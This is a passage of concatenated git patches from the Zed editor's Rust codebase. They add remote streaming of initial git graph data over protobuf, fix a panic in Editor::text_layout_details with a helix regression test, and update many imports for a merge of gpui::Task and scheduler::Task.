git::repository::GRAPH_CHUNK_SIZE; + let payload = envelope.payload; + + let repository_id = RepositoryId::from_proto(payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let log_order = log_order_from_proto(payload.log_order()); + let log_source = log_source_from_proto( + payload + .log_source + .context("missing initial graph data log source")?, + )?; + + let (subscriber_sender, subscriber_receiver) = async_channel::unbounded(); + let (cached_commits, error, is_loading) = + repository_handle.update(&mut cx, |repository, cx| { + let response = + repository.graph_data(log_source.clone(), log_order, 0..usize::MAX, cx); + let cached_commits = response.commits.to_vec(); + let error = response.error.clone(); + let is_loading = response.is_loading; + + if is_loading { + if let Some(graph_data) = repository + .initial_graph_data + .get_mut(&(log_source.clone(), log_order)) + { + graph_data.subscribers.push(subscriber_sender); + } + } + + (cached_commits, error, is_loading) + }); + + let (mut response_tx, response_rx) = mpsc::unbounded(); + cx.background_spawn(async move { + if let Some(error) = error { + if response_tx + .send(Err(anyhow!(error.to_string()))) + .await + .is_err() + { + return; + } + return; + } + + for commits in cached_commits.chunks(CHUNK_SIZE) { + let response = proto::GetInitialGraphDataResponse { + commits: commits + .iter() + .map(|commit| initial_graph_commit_to_proto(commit)) + .collect(), + }; + if response_tx.send(Ok(response)).await.is_err() { + return; + } + } + + if !is_loading { + return; + } + + while let Ok(chunk_result) = subscriber_receiver.recv().await { + let commits = match chunk_result { + Ok(commits) => commits, + Err(error) => { + response_tx + .send(Err(anyhow!(error.to_string()))) + .await + .context("Failed to send error") + .log_err(); + return; + } + }; + + for commits in commits.chunks(CHUNK_SIZE) { + let response = proto::GetInitialGraphDataResponse { + commits: 
commits + .iter() + .map(|commit| initial_graph_commit_to_proto(commit)) + .collect(), + }; + if response_tx.send(Ok(response)).await.is_err() { + return; + } + } + } + }) + .detach(); + + Ok(response_rx) + } + async fn handle_search_commits( this: Entity, envelope: TypedEnvelope, @@ -4413,23 +4514,7 @@ impl Repository { }); let (job_sender, state) = (refetch_repo_state)(cx); - - // todo(git_graph_remote): Make this subscription on both remote/local repo - cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { - RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { - if this.scan_id > 2 { - this.initial_graph_data.clear(); - } - } - RepositoryEvent::StashEntriesChanged => { - if this.scan_id > 2 { - this.initial_graph_data - .retain(|(log_source, _), _| *log_source != LogSource::All); - } - } - _ => {} - }) - .detach(); + cx.subscribe_self(Self::handle_subscribe_self).detach(); Repository { this: cx.weak_entity(), @@ -4481,6 +4566,8 @@ impl Repository { }); let (job_sender, repository_state) = (refetch_repo_state)(cx); + cx.subscribe_self(Self::handle_subscribe_self).detach(); + Self { this: cx.weak_entity(), snapshot, @@ -4501,6 +4588,25 @@ impl Repository { } } + fn handle_subscribe_self(&mut self, event: &RepositoryEvent, _: &mut Context) { + // scan id greater than 2 means the initial snapshot was calculated, + // otherwise we don't need to refresh the graph state + match event { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { + if self.scan_id > 2 { + self.initial_graph_data.clear(); + } + } + RepositoryEvent::StashEntriesChanged => { + if self.scan_id > 2 { + self.initial_graph_data + .retain(|(log_source, _), _| *log_source != LogSource::All); + } + } + _ => {} + } + } + pub fn git_store(&self) -> Option> { self.git_store.upgrade() } @@ -5121,28 +5227,51 @@ impl Repository { ) .await } - Ok(RepositoryState::Remote(_)) => { - Err("Git graph is not supported for collab yet".into()) + 
Ok(RepositoryState::Remote(remote)) => { + Self::remote_git_graph_data( + repository.clone(), + remote, + log_source.clone(), + log_order, + cx, + ) + .await } Err(e) => Err(SharedString::from(e)), }; - if let Err(fetch_task_error) = result { - repository - .update(cx, |repository, _| { - if let Some(data) = repository - .initial_graph_data - .get_mut(&(log_source, log_order)) - { - data.error = Some(fetch_task_error); - } else { - debug_panic!( - "This task would be dropped if this entry doesn't exist" - ); + repository + .update(cx, |repository, cx| { + if let Some(data) = repository + .initial_graph_data + .get_mut(&(log_source.clone(), log_order)) + { + match &result { + Ok(()) => { + cx.emit(RepositoryEvent::GraphEvent( + (log_source.clone(), log_order), + GitGraphEvent::FullyLoaded, + )); + } + Err(fetch_task_error) => { + data.subscribers.retain(|sender| { + sender.try_send(Err(fetch_task_error.clone())).is_ok() + }); + data.error = Some(fetch_task_error.clone()); + cx.emit(RepositoryEvent::GraphEvent( + (log_source.clone(), log_order), + GitGraphEvent::LoadingError, + )); + } } - }) - .ok(); - } + data.subscribers.clear(); + } else { + debug_panic!( + "This task would be dropped if this entry doesn't exist" + ); + } + }) + .log_err(); }); InitialGitGraphData { @@ -5150,6 +5279,7 @@ impl Repository { error: None, commit_data: Vec::new(), commit_oid_to_index: HashMap::default(), + subscribers: Vec::new(), } }); @@ -5164,6 +5294,47 @@ impl Repository { } } + async fn append_initial_graph_commits( + this: &WeakEntity, + graph_data_key: &(LogSource, LogOrder), + initial_graph_commit_data: Vec>, + cx: &mut AsyncApp, + ) { + this.update(cx, |repository, cx| { + let graph_data = repository + .initial_graph_data + .entry(graph_data_key.clone()) + .and_modify(|graph_data| { + if !graph_data.subscribers.is_empty() { + graph_data.subscribers.retain(|sender| { + sender + .try_send(Ok(initial_graph_commit_data.clone())) + .is_ok() + }); + } + + for commit_data in 
initial_graph_commit_data { + graph_data + .commit_oid_to_index + .insert(commit_data.sha, graph_data.commit_data.len()); + graph_data.commit_data.push(commit_data); + } + cx.emit(RepositoryEvent::GraphEvent( + graph_data_key.clone(), + GitGraphEvent::CountUpdated(graph_data.commit_data.len()), + )); + }); + + match &graph_data { + Entry::Occupied(_) => {} + Entry::Vacant(_) => { + debug_panic!("This task should be dropped if data doesn't exist"); + } + } + }) + .log_err(); + } + async fn local_git_graph_data( this: WeakEntity, backend: Arc, @@ -5187,34 +5358,52 @@ impl Repository { let graph_data_key = (log_source, log_order); while let Ok(initial_graph_commit_data) = request_rx.recv().await { - this.update(cx, |repository, cx| { - let graph_data = repository - .initial_graph_data - .entry(graph_data_key.clone()) - .and_modify(|graph_data| { - for commit_data in initial_graph_commit_data { - graph_data - .commit_oid_to_index - .insert(commit_data.sha, graph_data.commit_data.len()); - graph_data.commit_data.push(commit_data); - } - cx.emit(RepositoryEvent::GraphEvent( - graph_data_key.clone(), - GitGraphEvent::CountUpdated(graph_data.commit_data.len()), - )); - }); + Self::append_initial_graph_commits( + &this, + &graph_data_key, + initial_graph_commit_data, + cx, + ) + .await; + } - match &graph_data { - Entry::Occupied(_) => {} - Entry::Vacant(_) => { - debug_panic!("This task should be dropped if data doesn't exist"); - } - } + task.await?; + Ok(()) + } + + async fn remote_git_graph_data( + this: WeakEntity, + remote: RemoteRepositoryState, + log_source: LogSource, + log_order: LogOrder, + cx: &mut AsyncApp, + ) -> Result<(), SharedString> { + let repository_id = this + .update(cx, |repository, _| repository.id) + .map_err(|err| SharedString::from(err.to_string()))?; + let graph_data_key = (log_source.clone(), log_order); + let mut response = remote + .client + .request_stream(proto::GetInitialGraphData { + project_id: remote.project_id.to_proto(), + 
repository_id: repository_id.to_proto(), + log_source: Some(log_source_to_proto(&log_source)), + log_order: log_order_to_proto(log_order), }) - .ok(); + .await + .map_err(|err| SharedString::from(err.to_string()))?; + + while let Some(response) = response.next().await { + let response = response.map_err(|err| SharedString::from(err.to_string()))?; + let commits = response + .commits + .into_iter() + .map(initial_graph_commit_from_proto) + .collect::>>() + .map_err(|err| SharedString::from(err.to_string()))?; + Self::append_initial_graph_commits(&this, &graph_data_key, commits, cx).await; } - task.await?; Ok(()) } @@ -8249,6 +8438,65 @@ fn log_source_from_proto(log_source: proto::GitLogSource) -> Result { } } +fn log_order_to_proto(log_order: LogOrder) -> i32 { + match log_order { + LogOrder::DateOrder => proto::get_initial_graph_data::LogOrder::DateOrder as i32, + LogOrder::TopoOrder => proto::get_initial_graph_data::LogOrder::TopoOrder as i32, + LogOrder::AuthorDateOrder => { + proto::get_initial_graph_data::LogOrder::AuthorDateOrder as i32 + } + LogOrder::ReverseChronological => { + proto::get_initial_graph_data::LogOrder::ReverseChronological as i32 + } + } +} + +fn log_order_from_proto(log_order: proto::get_initial_graph_data::LogOrder) -> LogOrder { + match log_order { + proto::get_initial_graph_data::LogOrder::DateOrder => LogOrder::DateOrder, + proto::get_initial_graph_data::LogOrder::TopoOrder => LogOrder::TopoOrder, + proto::get_initial_graph_data::LogOrder::AuthorDateOrder => LogOrder::AuthorDateOrder, + proto::get_initial_graph_data::LogOrder::ReverseChronological => { + LogOrder::ReverseChronological + } + } +} + +fn initial_graph_commit_to_proto(commit: &InitialGraphCommitData) -> proto::InitialGraphCommit { + proto::InitialGraphCommit { + sha: commit.sha.to_string(), + parents: commit + .parents + .iter() + .map(|parent| parent.to_string()) + .collect(), + ref_names: commit + .ref_names + .iter() + .map(|ref_name| ref_name.to_string()) + .collect(), + 
} +} + +fn initial_graph_commit_from_proto( + commit: proto::InitialGraphCommit, +) -> Result> { + let sha = Oid::from_str(&commit.sha)?; + let mut parents = SmallVec::with_capacity(commit.parents.len()); + for parent in &commit.parents { + parents.push(Oid::from_str(parent)?); + } + Ok(Arc::new(InitialGraphCommitData { + sha, + parents, + ref_names: commit + .ref_names + .into_iter() + .map(SharedString::from) + .collect(), + })) +} + fn commit_data_to_proto(commit: &CommitData) -> proto::CommitData { proto::CommitData { sha: commit.sha.to_string(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index afea6cf34a3eaa..bf7bbeb4359f27 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -705,6 +705,30 @@ message GitLogSource { } } +message GetInitialGraphData { + uint64 project_id = 1; + uint64 repository_id = 2; + GitLogSource log_source = 3; + + enum LogOrder { + DATE_ORDER = 0; + TOPO_ORDER = 1; + AUTHOR_DATE_ORDER = 2; + REVERSE_CHRONOLOGICAL = 3; + } + LogOrder log_order = 4; +} + +message InitialGraphCommit { + string sha = 1; + repeated string parents = 2; + repeated string ref_names = 3; +} + +message GetInitialGraphDataResponse { + repeated InitialGraphCommit commits = 1; +} + message SearchCommits { uint64 project_id = 1; uint64 repository_id = 2; diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index 0c149fb2976844..a0fde40a84b85d 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -482,7 +482,9 @@ message Envelope { GetCommitData get_commit_data = 447; GetCommitDataResponse get_commit_data_response = 448; SearchCommits search_commits = 449; - SearchCommitsResponse search_commits_response = 450; // current max + SearchCommitsResponse search_commits_response = 450; + GetInitialGraphData get_initial_graph_data = 451; + GetInitialGraphDataResponse get_initial_graph_data_response = 452; // current max } reserved 87 to 88; diff --git 
a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 651e11354a9d36..49b9db0d5c37b9 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -358,6 +358,8 @@ messages!( (GitRepairWorktrees, Background), (GetCommitData, Background), (GetCommitDataResponse, Background), + (GetInitialGraphData, Background), + (GetInitialGraphDataResponse, Background), (SearchCommits, Background), (SearchCommitsResponse, Background), (GitWorktreesResponse, Background), @@ -575,6 +577,7 @@ request_messages!( (GitEditRef, Ack), (GitRepairWorktrees, Ack), (GetCommitData, GetCommitDataResponse), + (GetInitialGraphData, GetInitialGraphDataResponse), (SearchCommits, SearchCommitsResponse), (GitCreateWorktree, Ack), (GitRemoveWorktree, Ack), @@ -770,6 +773,7 @@ entity_messages!( GitEditRef, GitRepairWorktrees, GetCommitData, + GetInitialGraphData, SearchCommits, GitCreateArchiveCheckpoint, GitRestoreArchiveCheckpoint, From 61d506ea2543602f47807069cf42ad3d4c69f413 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 5 May 2026 18:46:22 -0300 Subject: [PATCH 213/231] editor: Fix panic in `text_layout_details` pre layout (#55816) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes a panic at `Editor::text_layout_details` when called against an editor whose element has never been laid out (i.e., `set_style` has never been called, so the cached `style` is still `None`). We've seen this crash once through a helix motion. The exact production sequence isn't clear — for the editor to receive a vim action without ever having been drawn, the active item would have to have changed inside the same update tick that ends with the deferred `search_submit`, which is narrow but not impossible (since it's dispatched by the workspace, not the editor). Release Notes: - Fixed a rare panic when invoking helix motions on an editor that had not yet been laid out. 
--- crates/editor/src/editor.rs | 2 +- crates/vim/src/helix.rs | 55 +++++++++++++++++++++++++++++++++++++ 2 files changed, 56 insertions(+), 1 deletion(-) diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index 649ffbfae8aa8f..7d68b02d4e2af1 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -5985,7 +5985,7 @@ impl Editor { pub fn text_layout_details(&self, window: &mut Window, cx: &mut App) -> TextLayoutDetails { TextLayoutDetails { text_system: window.text_system().clone(), - editor_style: self.style.clone().unwrap(), + editor_style: self.style.clone().unwrap_or_else(|| self.create_style(cx)), rem_size: window.rem_size(), scroll_anchor: self.scroll_manager.shared_scroll_anchor(cx), visible_rows: self.visible_line_count(), diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index d61b0547aef5ce..544a19167ac905 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -2960,6 +2960,61 @@ mod test { cx.assert_state("«ˇone» two three", Mode::HelixSelect); } + // Regression test for ZED-758: helix motions called + // `Editor::text_layout_details` on an editor whose `style` had never + // been set, panicking on `unwrap()`. 
+ #[gpui::test] + async fn test_helix_motion_on_unrendered_editor(cx: &mut gpui::TestAppContext) { + use editor::{Editor, EditorMode, SelectionEffects}; + use multi_buffer::{MultiBuffer, MultiBufferOffset}; + + VimTestContext::init(cx); + cx.update(|cx| { + VimTestContext::init_keybindings(true, cx); + SettingsStore::update_global(cx, |store, cx| { + store.update_user_settings(cx, |s| { + s.vim_mode = Some(true); + s.helix_mode = Some(true); + }); + }); + }); + + let cx = cx.add_empty_window(); + + let editor = cx.update(|window, cx| { + use gpui::AppContext as _; + let buffer = MultiBuffer::build_simple("one two three", cx); + cx.new(|cx| { + let mut editor = Editor::new(EditorMode::full(), buffer, None, window, cx); + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(4)..MultiBufferOffset(4)]) + }); + editor + }) + }); + + let vim = editor + .read_with(cx, |editor, _| editor.addon::().cloned()) + .expect("VimAddon should be auto-attached to new editors when vim mode is enabled"); + + cx.update(|window, cx| { + vim.entity.update(cx, |vim, cx| { + vim.switch_mode(Mode::HelixNormal, true, window, cx); + vim.helix_move_and_collapse(crate::motion::Motion::Left, None, window, cx); + }); + }); + + let cursor_offset = cx.update(|_, cx| { + editor.update(cx, |editor, cx| { + editor + .selections + .newest::(&editor.display_snapshot(cx)) + .head() + }) + }); + assert_eq!(cursor_offset, MultiBufferOffset(3)); + } + #[gpui::test] async fn test_helix_select_regex(cx: &mut gpui::TestAppContext) { let mut cx = VimTestContext::new(cx, true).await; From 63e3e62f6d84323ba14cc6d7317da70dbda328ce Mon Sep 17 00:00:00 2001 From: Conrad Irwin Date: Tue, 5 May 2026 16:41:13 -0600 Subject: [PATCH 214/231] Merge gpui::Task and scheduler::Task (#53674) Release Notes: - N/A or Added/Fixed/Improved ... 
--- crates/agent/src/agent.rs | 2 +- crates/agent_ui/src/agent_configuration.rs | 2 +- .../add_llm_provider_modal.rs | 2 +- .../configure_context_server_modal.rs | 3 +- crates/agent_ui/src/agent_diff.rs | 2 +- crates/agent_ui/src/agent_panel.rs | 2 +- crates/agent_ui/src/conversation_view.rs | 2 +- .../src/conversation_view/thread_view.rs | 1 + crates/agent_ui/src/inline_assistant.rs | 4 +- crates/agent_ui/src/message_editor.rs | 3 +- crates/agent_ui/src/model_selector.rs | 2 +- crates/agent_ui/src/thread_import.rs | 2 +- crates/agent_ui/src/thread_metadata_store.rs | 2 +- crates/agent_ui/src/threads_archive_view.rs | 3 +- crates/agent_ui/src/ui/mention_crease.rs | 3 +- crates/ai_onboarding/src/ai_onboarding.rs | 2 +- crates/auto_update/src/auto_update.rs | 4 +- crates/auto_update_ui/src/auto_update_ui.rs | 3 +- crates/call/src/call_impl/mod.rs | 2 +- crates/call/src/call_impl/room.rs | 2 +- crates/client/src/client.rs | 2 +- crates/client/src/llm_token.rs | 1 + crates/client/src/user.rs | 3 +- .../random_project_collaboration_tests.rs | 2 +- .../src/collab_panel/channel_modal.rs | 3 +- .../incoming_call_notification.rs | 2 +- .../project_shared_notification.rs | 2 +- crates/command_palette/src/command_palette.rs | 2 +- .../src/copilot_edit_prediction_delegate.rs | 2 +- crates/copilot_chat/src/copilot_chat.rs | 1 + crates/copilot_ui/src/sign_in.rs | 2 +- crates/debugger_tools/src/dap_log.rs | 3 +- crates/debugger_ui/src/attach_modal.rs | 2 +- crates/debugger_ui/src/debugger_panel.rs | 2 +- crates/debugger_ui/src/debugger_ui.rs | 2 +- crates/debugger_ui/src/new_process_modal.rs | 2 +- crates/debugger_ui/src/session/running.rs | 2 +- .../src/session/running/stack_frame_list.rs | 2 +- .../src/session/running/variable_list.rs | 5 +- crates/diagnostics/src/buffer_diagnostics.rs | 2 +- crates/edit_prediction/src/edit_prediction.rs | 1 + crates/edit_prediction/src/mercury.rs | 2 +- crates/edit_prediction/src/ollama.rs | 2 +- crates/edit_prediction/src/zeta.rs | 2 +- 
.../src/edit_prediction_context.rs | 4 +- .../src/edit_prediction_button.rs | 2 +- .../src/edit_prediction_ui.rs | 1 + crates/editor/src/clangd_ext.rs | 2 +- crates/editor/src/code_context_menus.rs | 4 +- crates/editor/src/code_lens.rs | 2 +- crates/editor/src/editor_tests.rs | 4 +- crates/editor/src/element.rs | 6 +- crates/editor/src/hover_popover.rs | 4 +- crates/editor/src/rust_analyzer_ext.rs | 2 +- crates/extension_host/src/extension_host.rs | 4 +- .../src/extension_store_test.rs | 2 +- crates/extensions_ui/src/extensions_ui.rs | 2 +- crates/file_finder/src/file_finder.rs | 2 +- crates/git_ui/src/branch_picker.rs | 2 +- crates/git_ui/src/git_panel.rs | 4 +- crates/git_ui/src/git_ui.rs | 2 +- crates/git_ui/src/stash_picker.rs | 2 +- crates/git_ui/src/worktree_picker.rs | 4 +- crates/git_ui/src/worktree_service.rs | 2 +- crates/gpui/src/executor.rs | 106 ++++-------------- crates/gpui/src/prelude.rs | 2 +- crates/inspector_ui/src/inspector.rs | 2 +- crates/journal/src/journal.rs | 2 +- .../language_models/src/provider/anthropic.rs | 2 +- .../language_models/src/provider/bedrock.rs | 3 +- crates/language_models/src/provider/cloud.rs | 2 +- .../language_models/src/provider/deepseek.rs | 2 +- crates/language_models/src/provider/google.rs | 2 +- .../language_models/src/provider/lmstudio.rs | 2 +- .../language_models/src/provider/mistral.rs | 2 +- crates/language_models/src/provider/ollama.rs | 2 +- .../language_models/src/provider/open_ai.rs | 2 +- .../src/provider/open_ai_compatible.rs | 2 +- .../src/provider/open_router.rs | 2 +- .../language_models/src/provider/opencode.rs | 2 +- .../src/provider/vercel_ai_gateway.rs | 2 +- crates/language_models/src/provider/x_ai.rs | 2 +- .../src/language_selector.rs | 2 +- crates/language_tools/src/lsp_button.rs | 2 +- crates/onboarding/src/basics_page.rs | 2 +- crates/outline_panel/src/outline_panel.rs | 2 +- crates/project/src/agent_registry_store.rs | 2 +- crates/project/src/agent_server_store.rs | 2 +- 
crates/project/src/buffer_store.rs | 3 +- crates/project/src/context_server_store.rs | 4 +- crates/project/src/debugger/dap_store.rs | 2 +- crates/project/src/debugger/session.rs | 2 +- crates/project/src/git_store.rs | 2 +- crates/project/src/lsp_command.rs | 2 +- crates/project/src/lsp_store.rs | 2 +- crates/project/src/lsp_store/log_store.rs | 4 +- crates/project/src/project.rs | 2 +- crates/project/src/worktree_store.rs | 2 +- crates/project_benchmarks/src/main.rs | 1 + crates/project_symbols/src/project_symbols.rs | 4 +- crates/recent_projects/src/recent_projects.rs | 2 +- crates/recent_projects/src/remote_servers.rs | 2 +- .../src/sidebar_recent_projects.rs | 2 +- crates/remote/src/remote_client.rs | 2 +- crates/remote_server/src/headless_project.rs | 2 +- crates/repl/src/notebook/notebook_ui.rs | 2 +- crates/repl/src/repl_sessions_ui.rs | 2 +- crates/repl/src/repl_store.rs | 4 +- crates/rules_library/src/rules_library.rs | 2 +- crates/search/src/buffer_search.rs | 2 +- crates/search/src/project_search.rs | 3 +- .../pages/edit_prediction_provider_setup.rs | 2 +- crates/sidebar/src/sidebar.rs | 4 +- crates/snippets_ui/src/snippets_ui.rs | 2 +- crates/tab_switcher/src/tab_switcher.rs | 2 +- crates/task/src/static_source.rs | 2 +- crates/tasks_ui/src/tasks_ui.rs | 2 +- crates/terminal_view/src/terminal_panel.rs | 4 +- .../src/terminal_path_like_target.rs | 2 +- crates/terminal_view/src/terminal_view.rs | 4 +- crates/title_bar/src/collab.rs | 4 +- crates/title_bar/src/onboarding_banner.rs | 2 +- crates/title_bar/src/title_bar.rs | 2 +- crates/ui/src/components/context_menu.rs | 2 +- crates/vim/src/command.rs | 3 +- crates/vim/src/helix.rs | 2 +- crates/vim/src/normal.rs | 2 +- crates/vim/src/normal/mark.rs | 2 +- crates/vim/src/normal/search.rs | 2 +- crates/vim/src/state.rs | 3 +- crates/workspace/src/item.rs | 2 +- crates/workspace/src/multi_workspace.rs | 4 +- crates/workspace/src/pane.rs | 4 +- crates/workspace/src/persistence.rs | 1 + 
crates/workspace/src/tasks.rs | 2 +- crates/workspace/src/welcome.rs | 2 +- crates/workspace/src/workspace.rs | 4 +- crates/zed/src/main.rs | 4 +- crates/zed/src/reliability.rs | 2 +- crates/zed/src/zed.rs | 2 +- crates/zed/src/zed/open_listener.rs | 2 +- .../zed/src/zed/quick_action_bar/repl_menu.rs | 1 + crates/zed/src/zed/remote_debug.rs | 105 ++++++++--------- 143 files changed, 256 insertions(+), 291 deletions(-) diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 1a7aaffb58053d..95b79a0cc153bd 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -37,7 +37,7 @@ use futures::future::Shared; use futures::{FutureExt as _, StreamExt as _, future}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task, - WeakEntity, + TaskExt, WeakEntity, }; use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry}; use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree}; diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index da0704889e7fb9..39b1302555bebf 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -17,7 +17,7 @@ use extension_host::ExtensionStore; use fs::Fs; use gpui::{ Action, Anchor, AnyView, App, AsyncWindowContext, Entity, EventEmitter, FocusHandle, Focusable, - ScrollHandle, Subscription, Task, WeakEntity, + ScrollHandle, Subscription, Task, TaskExt, WeakEntity, }; use itertools::Itertools; use language::LanguageRegistry; diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index 1cff19c7cf4b3e..8eeda6447e878d 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -4,7 +4,7 @@ use anyhow::Result; use collections::HashSet; use fs::Fs; use 
gpui::{ - DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Render, ScrollHandle, Task, + DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Render, ScrollHandle, Task, TaskExt, }; use language_model::LanguageModelRegistry; use language_models::provider::open_ai_compatible::{AvailableModel, ModelCapabilities}; diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 465d31b416e9e8..48d01e506bf423 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -5,7 +5,8 @@ use editor::{Editor, EditorElement, EditorStyle}; use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TaskExt, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, + prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; diff --git a/crates/agent_ui/src/agent_diff.rs b/crates/agent_ui/src/agent_diff.rs index 4a5771fd9810fe..6f4e900be4245d 100644 --- a/crates/agent_ui/src/agent_diff.rs +++ b/crates/agent_ui/src/agent_diff.rs @@ -15,7 +15,7 @@ use editor::{ use gpui::{ Action, AnyElement, App, AppContext, Empty, Entity, EventEmitter, FocusHandle, Focusable, - Global, SharedString, Subscription, Task, WeakEntity, Window, prelude::*, + Global, SharedString, Subscription, Task, TaskExt, WeakEntity, Window, prelude::*, }; use language::{Buffer, Capability, OffsetRangeExt, Point}; diff --git a/crates/agent_ui/src/agent_panel.rs b/crates/agent_ui/src/agent_panel.rs index 8285da9e113e92..921d1347ffb6c3 100644 --- a/crates/agent_ui/src/agent_panel.rs +++ b/crates/agent_ui/src/agent_panel.rs @@ -60,7 +60,7 @@ use fs::Fs; use gpui::{ Action, 
Anchor, Animation, AnimationExt, AnyElement, App, AsyncWindowContext, ClipboardItem, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, KeyContext, Pixels, Subscription, - Task, UpdateGlobal, WeakEntity, prelude::*, pulsating_between, + Task, TaskExt, UpdateGlobal, WeakEntity, prelude::*, pulsating_between, }; use language::LanguageRegistry; use language_model::LanguageModelRegistry; diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index c01d8d8c04ccbd..9dd97975a184ee 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -31,7 +31,7 @@ use futures::FutureExt as _; use gpui::{ Action, Animation, AnimationExt, AnyView, App, ClickEvent, ClipboardItem, CursorStyle, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, Hsla, ListOffset, ListState, - ObjectFit, PlatformDisplay, ScrollHandle, SharedString, Subscription, Task, TextStyle, + ObjectFit, PlatformDisplay, ScrollHandle, SharedString, Subscription, Task, TaskExt, TextStyle, WeakEntity, Window, WindowHandle, div, ease_in_out, img, linear_color_stop, linear_gradient, list, point, pulsating_between, }; diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 0e0b3d04a8dbc6..c8971392941589 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -13,6 +13,7 @@ use feature_flags::AcpBetaFeatureFlag; use crate::message_editor::SharedSessionCapabilities; use gpui::List; +use gpui::TaskExt; use heapless::Vec as ArrayVec; use language_model::{LanguageModelEffortLevel, Speed}; use settings::{SidebarSide, update_settings_file}; diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index d442a61e01ae1d..b13a9b615b6f45 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -35,8 +35,8 
@@ use editor::{ use fs::Fs; use futures::{FutureExt, channel::mpsc}; use gpui::{ - App, Context, Entity, Focusable, Global, HighlightStyle, Subscription, Task, UpdateGlobal, - WeakEntity, Window, point, + App, Context, Entity, Focusable, Global, HighlightStyle, Subscription, Task, TaskExt, + UpdateGlobal, WeakEntity, Window, point, }; use language::{Buffer, Point, Selection, TransactionId}; use language_model::{ConfigurationError, ConfiguredModel, LanguageModelRegistry}; diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index d839e87d98ee91..16f69b297cf8b5 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -22,7 +22,8 @@ use editor::{ use futures::{FutureExt as _, future::join_all}; use gpui::{ AppContext, ClipboardEntry, ClipboardItem, Context, Entity, EventEmitter, FocusHandle, - Focusable, ImageFormat, KeyContext, SharedString, Subscription, Task, TextStyle, WeakEntity, + Focusable, ImageFormat, KeyContext, SharedString, Subscription, Task, TaskExt, TextStyle, + WeakEntity, }; use language::{Buffer, language_settings::InlayHintKind}; use parking_lot::RwLock; diff --git a/crates/agent_ui/src/model_selector.rs b/crates/agent_ui/src/model_selector.rs index e1cf7307394571..4717197949673a 100644 --- a/crates/agent_ui/src/model_selector.rs +++ b/crates/agent_ui/src/model_selector.rs @@ -11,7 +11,7 @@ use futures::FutureExt; use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ Action, AsyncWindowContext, BackgroundExecutor, DismissEvent, FocusHandle, Subscription, Task, - WeakEntity, + TaskExt, WeakEntity, }; use itertools::Itertools; use ordered_float::OrderedFloat; diff --git a/crates/agent_ui/src/thread_import.rs b/crates/agent_ui/src/thread_import.rs index f5d6fa1a657d2f..1bee86602ed9ed 100644 --- a/crates/agent_ui/src/thread_import.rs +++ b/crates/agent_ui/src/thread_import.rs @@ -9,7 +9,7 @@ use fs::Fs; use futures::FutureExt as _; use gpui::{ App, Context, 
